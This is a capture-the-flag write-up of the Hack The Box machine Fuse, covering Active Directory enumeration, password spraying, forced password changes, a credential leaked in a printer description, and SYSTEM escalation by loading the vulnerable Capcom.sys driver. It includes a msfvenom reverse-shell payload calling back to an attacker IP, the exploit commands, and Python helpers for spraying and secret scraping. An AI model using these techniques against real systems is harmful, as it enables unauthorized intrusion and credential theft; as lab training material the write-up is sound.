Hack The Box: Fuse
Welcome to my detailed writeup of the medium difficulty machine "Fuse" on Hack The Box. This writeup covers the steps taken to achieve an initial foothold and escalate to NT AUTHORITY\SYSTEM.
🕵️♂️ Initial Enumeration
Nmap
```shell
$ rustscan -a 10.129.2.5 --ulimit 5000 -g
10.129.2.5 -> [139,135,88,80,53,464,445,389,636,593,3268,3269,5985,9389,49667,49666,49677,49678,49679,49707]
```
```shell
$ nmap -p139,135,88,80,53,464,445,389,636,593,3268,3269,5985,9389,49667,49666,49677,49678,49679,49707 -sCV 10.129.2.5 -oN allPorts
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 22:56 CEST
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.88% done; ETC: 22:58 (0:00:00 remaining)
Nmap scan report for 10.129.2.5
Host is up (0.041s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-29 19:10:14Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc        Microsoft Windows RPC
49679/tcp open  msrpc        Microsoft Windows RPC
49707/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-07-29T12:11:07-07:00
| smb2-time:
|   date: 2024-07-29T19:11:04
|_  start_date: 2024-07-29T19:07:02
|_clock-skew: mean: 33m18s, deviation: 4h02m32s, median: -1h46m43s
```
UDP
```shell
$ sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.2.5 -oN ../scan/allPorts.UDP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 23:22 CEST
Nmap scan report for 10.129.2.5
Host is up (0.054s latency).
Not shown: 1497 open|filtered udp ports (no-response)
PORT   STATE SERVICE
53/udp open  domain
88/udp open  kerberos-sec
123/udp open  ntp
```
🌐 Web Enumeration
So far we have discovered the domain fabricorp.local and the hostname fuse.fabricorp.local. The combination of DNS, Kerberos, LDAP plus global catalog (3268/3269), SMB with signing required and WinRM on 5985 tells us this host is the domain controller. Keep the clock-skew line from nmap in mind: Kerberos rejects requests from a client whose clock is more than five minutes off the KDC, so if Kerberos-based tools fail with a skew error, sync the clock against the DC first.
There is a web service, so let's take a look (both names need to resolve to 10.129.2.5, so add them to /etc/hosts):
```shell
$ whatweb http://fabricorp.local
http://fabricorp.local [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.2.5], Meta-Refresh-Redirect[http://fuse.fabricorp.local/papercut/logs/html/index.htm], Microsoft-IIS[10.0]
http://fuse.fabricorp.local/papercut/logs/html/index.htm [200 OK] Country[RESERVED][ZZ], Frame, HTTPServer[Microsoft-IIS/10.0], IP[10.129.2.5], Microsoft-IIS[10.0], Title[PaperCut Print Logger : Print Logs]
```
It seems to be related to a print service (PaperCut Print Logger, which records every print job with the user, printer and document name). We see three files:
- papercut-print-log-xxxx-xx-xx.csv
From them we obtain usernames:
- pmerton
- tlavel
- sthompson
- bhult
Also a printer name, HP-MFT01.
And some interesting names among the printed documents:
- backup_tapes
- Fabricorp01.docx
With kerbrute we can validate these users. Its userenum mode only sends AS-REQs without pre-authentication to the KDC: an unknown principal gets KDC_ERR_C_PRINCIPAL_UNKNOWN, a real one gets asked for pre-auth, and because no password is ever tried, nothing counts as a failed logon and no account can be locked out.
```shell
2024/07/29 23:11:13 > [+] VALID USERNAME: tlavel@fabricorp.local
2024/07/29 23:11:13 > [+] VALID USERNAME: bhult@fabricorp.local
2024/07/29 23:11:13 > [+] VALID USERNAME: pmerton@fabricorp.local
2024/07/29 23:11:13 > [+] VALID USERNAME: sthompson@fabricorp.local
```
After enumerating further I find nothing else, so I will use the names of the printed documents (and a few variations of them) as passwords:
```shell
$ cat passwords.txt
mega_mountain_tape_request
mega_mountain
mega_mountain_tape
Fabricorp01
fabricorp01
backup_tapes
offsite_dr_invocation
dr_invocation
printing_issue_test
```
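As an added example (not from the original writeup), the following Python script automates what was just done by hand: it parses a PaperCut print-logger CSV, pulls out the distinct users and printer names, and derives a spray wordlist from the document names (name without extension, lowercase and capitalised variants, and every underscore-joined prefix, which is how mega_mountain_tape_request yields mega_mountain and mega_mountain_tape). The column layout is assumed to follow PaperCut's CSV export; the rows are constructed and are not the machine's real log.

```python
import csv
import io
import re

# Constructed rows in the layout of a PaperCut Print Logger CSV export.
# The header is assumed to match PaperCut's format; the rows are invented
# and are not the machine's real papercut-print-log-*.csv.
SAMPLE_LOG = """\
Time,User,Pages,Copies,Printer,Document Name,Client,Paper Size,Language,Height,Width,Duplex,Grayscale,Size
2020-05-29 00:57:26,pmerton,1,1,HP-MFT01,mega_mountain_tape_request,LAPTOP-1,LETTER,PCL6,279,216,NOT DUPLEX,GRAYSCALE,1kb
2020-05-29 00:58:11,tlavel,1,1,HP-MFT01,Fabricorp01.docx,LAPTOP-2,LETTER,PCL6,279,216,NOT DUPLEX,GRAYSCALE,5kb
2020-05-29 01:02:03,sthompson,2,1,HP-MFT01,backup_tapes,DESKTOP-3,A4,PCL6,297,210,DUPLEX,NOT GRAYSCALE,3kb
2020-05-30 09:14:40,bnielson,1,1,HP-MFT01,offsite_dr_invocation,LAPTOP-4,A4,PCL6,297,210,NOT DUPLEX,GRAYSCALE,2kb
"""


def parse_print_log(text):
    """Parse the CSV text into a list of row dicts keyed by the header."""
    return list(csv.DictReader(io.StringIO(text)))


def users(rows):
    """Distinct usernames, sorted, ready to feed to kerbrute userenum."""
    return sorted({r["User"].strip() for r in rows if r["User"].strip()})


def printers(rows):
    """Distinct printer names (each one is usually also an SMB share)."""
    return sorted({r["Printer"].strip() for r in rows if r["Printer"].strip()})


def candidate_passwords(rows):
    """Spray candidates derived from document names: the name without its
    extension, lowercase and capitalised variants, and every underscore-
    joined prefix ("a_b_c_d" -> "a_b", "a_b_c"). Order is preserved and
    duplicates are dropped so the list can be written straight to a file."""
    out = []

    def add(candidate):
        if candidate and candidate not in out:
            out.append(candidate)

    for r in rows:
        base = re.sub(r"\.[A-Za-z0-9]{1,5}$", "", r["Document Name"].strip())
        add(base)
        add(base.lower())
        add(base.capitalize())
        parts = base.split("_")
        for i in range(2, len(parts)):
            add("_".join(parts[:i]))
    return out


if __name__ == "__main__":
    rows = parse_print_log(SAMPLE_LOG)
    print("\n".join(users(rows)))       # users.txt
    print("\n".join(candidate_passwords(rows)))  # passwords.txt
```

Redirect the two print calls to users.txt and passwords.txt and the output plugs directly into the kerbrute and nxc commands used on this page.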
Password Spraying
With nxc we will password-spray to see if we land an account. Before throwing a whole list at every user, check the domain lockout policy (nxc smb 10.129.2.5 --pass-pol with any valid credential, or a null session if it is allowed); nine passwords per user is more than many domains tolerate before locking accounts. Note that the users.txt used below also contains bnielson, who is not in the list above.
```shell
$ nxc smb 10.129.2.5 -u users.txt -p passwords.txt --shares
SMB 10.129.2.5 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:mega_mountain_tape_request STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:mega_mountain_tape_request STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:mega_mountain_tape_request STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:mega_mountain_tape_request STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:mega_mountain_tape_request STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:mega_mountain STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:mega_mountain STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:mega_mountain STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:mega_mountain STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:mega_mountain STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:mega_mountain_tape STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:mega_mountain_tape STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:mega_mountain_tape STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:mega_mountain_tape STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:mega_mountain_tape STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:Fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:Fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:backup_tapes STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:backup_tapes STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:backup_tapes STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:backup_tapes STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:backup_tapes STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:offsite_dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:offsite_dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:offsite_dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:offsite_dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:offsite_dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:dr_invocation STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:printing_issue_test STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:printing_issue_test STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:printing_issue_test STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:printing_issue_test STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bhult:printing_issue_test STATUS_LOGON_FAILURE
```
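The interesting part of a spray is often not the [+] lines but the failure codes, and it is easy to miss a STATUS_PASSWORD_MUST_CHANGE among fifty STATUS_LOGON_FAILURE lines. As an added example (not from the original writeup), here is a Python triage of nxc's SMB output: it separates true failures from NT status codes that the DC only returns after the password has been verified, flags lockouts, and counts attempts per user so the run can be compared with the lockout threshold from --pass-pol. The sample lines are constructed in nxc's output format and are not the full run above.

```python
import re
from collections import defaultdict

# Constructed lines in the format nxc prints for "nxc smb <ip> -u users -p passwords";
# they are a sample, not the full run shown on this page.
SAMPLE_OUTPUT = r"""
SMB 10.129.2.5 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:Fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\bnielson:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\sthompson:fabricorp01 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [-] fabricorp.local\pmerton:backup_tapes STATUS_ACCOUNT_LOCKED_OUT
SMB 10.129.2.5 445 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
"""

# One result line: "[marker] DOMAIN\user:password [STATUS_...]".
LINE_RE = re.compile(r"\[([-+*!])\]\s+([^\\\s]+)\\([^:\s]+):(\S+)(?:\s+(STATUS_\w+))?")

# NT status codes that are only returned AFTER the password was verified:
# the credential is good even though the logon was refused.
VALID_PASSWORD_STATUSES = {
    "STATUS_PASSWORD_MUST_CHANGE",
    "STATUS_PASSWORD_EXPIRED",
    "STATUS_ACCOUNT_DISABLED",
    "STATUS_ACCOUNT_EXPIRED",
    "STATUS_ACCOUNT_RESTRICTION",
    "STATUS_INVALID_LOGON_HOURS",
    "STATUS_INVALID_WORKSTATION",
    "STATUS_LOGON_TYPE_NOT_GRANTED",
}


def triage(text):
    """Group spray results by meaning and count attempts per user.
    Returns (buckets, attempts): buckets maps success / valid_but_unusable /
    locked_out / failed to lists of (user, password, status)."""
    buckets = {"success": [], "valid_but_unusable": [], "locked_out": [], "failed": []}
    attempts = defaultdict(int)
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # banner or unrelated line
        marker, _domain, user, password, status = m.groups()
        attempts[user] += 1
        entry = (user, password, status or "")
        if marker == "+":
            buckets["success"].append(entry)
        elif status == "STATUS_ACCOUNT_LOCKED_OUT":
            buckets["locked_out"].append(entry)
        elif status in VALID_PASSWORD_STATUSES:
            buckets["valid_but_unusable"].append(entry)
        else:
            buckets["failed"].append(entry)
    return buckets, dict(attempts)


def over_threshold(attempts, lockout_threshold):
    """Users whose attempt count reached the domain lockout threshold
    (0 means the domain has no lockout policy)."""
    if not lockout_threshold:
        return []
    return sorted(u for u, n in attempts.items() if n >= lockout_threshold)


if __name__ == "__main__":
    buckets, attempts = triage(SAMPLE_OUTPUT)
    for name, entries in buckets.items():
        print(name, entries)
    print("at lockout threshold:", over_threshold(attempts, 2))
```

Pipe a real run through it (nxc ... | tee spray.log, then triage(open("spray.log").read())); any user in locked_out means the spray should stop immediately, and valid_but_unusable is the bucket this box hinges on.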
Changing Users' Passwords with impacket-smbpasswd
We find several valid users who must change their passwords:
- bnielson:Fabricorp01
- tlavel:Fabricorp01
- bhult:Fabricorp01
Whenever we try to authenticate as any of them the DC returns STATUS_PASSWORD_MUST_CHANGE: the password is correct, but the account is flagged "user must change password at next logon", so a normal logon is refused.
This is not a problem, because a user can change their own expired password over SAMR without ever completing a logon, and that is exactly what tools like smbpasswd do (the deprecation warning below refers to its replacement, changepasswd.py, which works the same way). It is very noisy, and on a real engagement changing a target user's password would need explicit authorization, but we are in a CTF...
```shell
$ impacket-smbpasswd bnielson@10.129.2.5 -newpass pointed123
Impacket v0.11.0 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

Current SMB password:
[!] Password is expired, trying to bind with a null session.
[-] Some password update rule has been violated. For example, the password may not meet length criteria.
```
The domain password policy rejected that one, so let's use a more robust password that meets the complexity requirements:
```shell
$ impacket-smbpasswd bnielson@10.129.2.5 -newpass Pointed123@
Impacket v0.11.0 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
```
Let's verify it with nxc:
```shell
$ nxc smb 10.129.2.5 -u 'bnielson' -p 'Pointed123@'
SMB 10.129.2.5 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.129.2.5 445 FUSE [+] fabricorp.local\bnielson:Pointed123@
```
None of the users in the list is a member of the Remote Management Users group, so we cannot use tools like evil-winrm to get a shell with them.
📂 Enumerating SMB
By the time I try to enumerate SMB the password has already been reset, so we can deduce there is a scheduled script behind the scenes that keeps restoring these users' passwords. This is why a different password shows up in each of the following commands: every step needed a fresh change.
```shell
$ smbmap -H 10.129.2.5 -u bnielson -p 'ASsdasd23123123@'
[+] IP: 10.129.2.5:445	Name: fabricorp.local
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	HP-MFT01                                          	NO ACCESS	HP-MFT01
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share
	print$                                            	READ ONLY	Printer Drivers
	SYSVOL                                            	READ ONLY	Logon server share
```
The only share that looks interesting is print$ (printer drivers), but nothing of interest was found in it.
📂 Enumerating RPC and Gaining Foothold
With rpcclient we continue enumerating users, groups and computers. A plain domain user is enough to query SAMR here, so perfect.
```shell
$ rpcclient -U bnielson%'Wachiturro123@' 10.129.2.5
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
```
Among the domain groups (enumdomgroups) we see an interesting one:
```shell
group:[IT_Accounts] rid:[0x644]
```
But it has no description:
```shell
rpcclient $> querygroup 0x644
	Group Name:	IT_Accounts
	Description:
	Group Attribute:7
	Num Members:2
```
Since we already know there is a print service, we can enumerate the printers as well, and the description of HP-MFT01 contains a credential (a scan-to-folder password left in the printer's description field):
```shell
rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.129.2.5\HP-MFT01]
	description:[\\10.129.2.5\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]
```
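The credential above was spotted by reading the description by eye, which does not scale past a handful of printers. As an added example (not part of the original writeup), the Python below parses rpcclient's enumprinters output into one record per printer and scans the free-text fields for password-like tokens. The input is constructed: the first printer reproduces the description shown above, the second is invented as a clean control.

```python
import re

# Constructed rpcclient "enumprinters" output: the first printer reproduces the
# description from the box, the second is invented as a clean control.
SAMPLE_ENUMPRINTERS = r"""
    flags:[0x800000]
    name:[\\10.129.2.5\HP-MFT01]
    description:[\\10.129.2.5\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
    comment:[]

    flags:[0x800000]
    name:[\\10.129.2.5\LOBBY-LJ]
    description:[\\10.129.2.5\LOBBY-LJ,HP LaserJet,Lobby]
    comment:[Ask reception before printing]
"""

# One "key:[value]" line of rpcclient output.
FIELD_RE = re.compile(r"^\s*(\w+):\[(.*)\]\s*$")
# Words that commonly precede a secret in free-text fields, followed by the value.
SECRET_RE = re.compile(
    r"(?:pass(?:word|wd)?|pwd|secret|credentials?)\s*[:=]\s*([^\s,)\]]+)", re.I
)


def parse_enumprinters(text):
    """Split rpcclient enumprinters output into a list of {field: value} dicts.
    A record ends at a blank line or when the next "flags" field starts."""
    printers, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            if current:
                printers.append(current)
                current = {}
            continue
        key, value = m.groups()
        if key == "flags" and current:
            printers.append(current)
            current = {}
        current[key] = value
    if current:
        printers.append(current)
    return printers


def find_secrets(printers):
    """Return (printer name, field, secret) for every password-like token found
    in the description, comment or name of each printer."""
    hits = []
    for p in printers:
        for field in ("description", "comment", "name"):
            for m in SECRET_RE.finditer(p.get(field, "")):
                hits.append((p.get("name", ""), field, m.group(1)))
    return hits


if __name__ == "__main__":
    for name, field, secret in find_secrets(parse_enumprinters(SAMPLE_ENUMPRINTERS)):
        print(f"{name} [{field}]: {secret}")
```

The same keyword regex is worth running over every other free-text attribute you can read as a low-privileged user (AD user and computer descriptions, share comments, GPO scripts), because a password in a printer description is rarely the only one.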
The description does not say which account the scan2docs password belongs to, so with nxc we spray it across the user list from rpcclient; it turns out to be valid for svc-print (output truncated):
```shell
v1ce$1 STATUS_LOGON_FAILURE
SMB 10.129.2.5 445 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1
```
And this user is allowed to connect via WinRM, just like that:
```shell
$ nxc winrm 10.129.2.5 -u svc-print -p '$fab@s3Rv1ce$1'
WINRM 10.129.2.5 5985 FUSE [*] Windows 10 / Server 2016 Build 14393 (name:FUSE) (domain:fabricorp.local)
WINRM 10.129.2.5 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
```
Connecting via WinRM
```shell
$ evil-winrm -i 10.129.2.5 -u svc-print -p '$fab@s3Rv1ce$1'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
```
Privilege Escalation
This user holds SeLoadDriverPrivilege. I have abused this privilege several times before: it lets us load a kernel driver, so we can load a known-vulnerable (but validly signed) driver and use it to escalate to SYSTEM.

```shell
*Evil-WinRM* PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```
Using this PoC saves a lot of work; TarLogic wrote a very interesting post on exploiting this case. The trick is that NtLoadDriver takes a registry path to a service key and accepts one under the caller's own HKCU hive (\Registry\User\<SID>\...), which an unprivileged user can write, so with SeLoadDriverPrivilege held no access to HKLM\SYSTEM is needed. Capcom.sys is a legitimately signed driver whose IOCTL handler executes a caller-supplied function pointer in kernel mode, which ExploitCapcom.exe uses to steal the SYSTEM token. Two caveats for anyone trying this outside a CTF: on a host with HVCI or Microsoft's vulnerable driver blocklist enabled the load is refused, and loading a driver is loud (Sysmon event ID 6, driver loaded, plus the service key written under the user's hive).
First, with msfvenom, we create a reverse shell payload for Windows x64:
```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.71 LPORT=443 -f exe -o rev.exe
```
Now we download the repository mentioned above. We need to upload Capcom.sys, LoadDriver.exe, rev.exe and ExploitCapcom.exe. Since we have an evil-winrm console we can upload the files directly, as that is a built-in feature of the tool.
```shell
*Evil-WinRM* PS C:\Users\svc-print\privesc> upload rev.exe

Info: Uploading /home/pointedsec/Desktop/fuse/content/rev.exe to C:\Users\svc-print\privesc\rev.exe

Data: 9556 bytes of 9556 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\privesc> upload SeLoadDriverPrivilege/Capcom.sys

Info: Uploading /home/pointedsec/Desktop/fuse/content/SeLoadDriverPrivilege/Capcom.sys to C:\Users\svc-print\privesc\Capcom.sys

Data: 14100 bytes of 14100 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\privesc> upload SeLoadDriverPrivilege/LoadDriver.exe

Info: Uploading /home/pointedsec/Desktop/fuse/content/SeLoadDriverPrivilege/LoadDriver.exe to C:\Users\svc-print\privesc\LoadDriver.exe

Data: 20480 bytes of 20480 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\privesc> upload SeLoadDriverPrivilege/ExploitCapcom.exe

Info: Uploading /home/pointedsec/Desktop/fuse/content/SeLoadDriverPrivilege/ExploitCapcom.exe to C:\Users\svc-print\privesc\ExploitCapcom.exe

Data: 357716 bytes of 357716 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\privesc> dir


    Directory: C:\Users\svc-print\privesc


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2024   1:27 PM          10576 Capcom.sys
-a----        7/29/2024   1:27 PM         268288 ExploitCapcom.exe
-a----        7/29/2024   1:27 PM          15360 LoadDriver.exe
-a----        7/29/2024   1:27 PM           7168 rev.exe
```
Now we start a netcat listener on port 443:
```shell
$ sudo rlwrap -cEr nc -lvnp 443
listening on [any] 443 ...
```
And on the victim we run LoadDriver.exe. It takes the registry path of the service key to create for the driver, which can be any name under System\CurrentControlSet (the tool creates it relative to the current user's hive), and the path to Capcom.sys:
```shell
*Evil-WinRM* PS C:\Users\svc-print\privesc> .\LoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\privesc\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
```
NTSTATUS 0 means the driver is now loaded. Note the path in the output: it lives under our own SID (the trailing RID 1104 is 0x450, the RID enumdomusers showed for svc-print), i.e. under HKCU rather than HKLM, which is why no administrative rights were needed to create it.
Now we run ExploitCapcom.exe. The documentation says to move rev.exe to C:\Windows\Temp\rev.exe and run ExploitCapcom.exe without parameters, but for some reason that did not work for me, so we pass the path to rev.exe as a parameter instead:
```shell
*Evil-WinRM* PS C:\Users\svc-print\privesc> .\ExploitCapcom.exe C:\Users\svc-print\privesc\rev.exe
[+] Path is: C:\Users\svc-print\privesc\rev.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001AF5B210008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
```
On the listener we receive the shell:
```shell
$ sudo rlwrap -cEr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.2.5] 50550
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\svc-print\privesc>whoami
whoami
nt authority\system
```
We now have access as nt authority\system, so we have escalated privileges and finished this machine.
Happy Hacking! 🚀
#HackTheBox #FUSE #Writeup #Cybersecurity #Penetration Testing #CTF #Domain User Enumeration #Kerbrute #Password Spraying #RPC Enumeration #EvilWinRM #Abusing SeLoadDriverPrivilege #Privilege Escalation #Exploit #Windows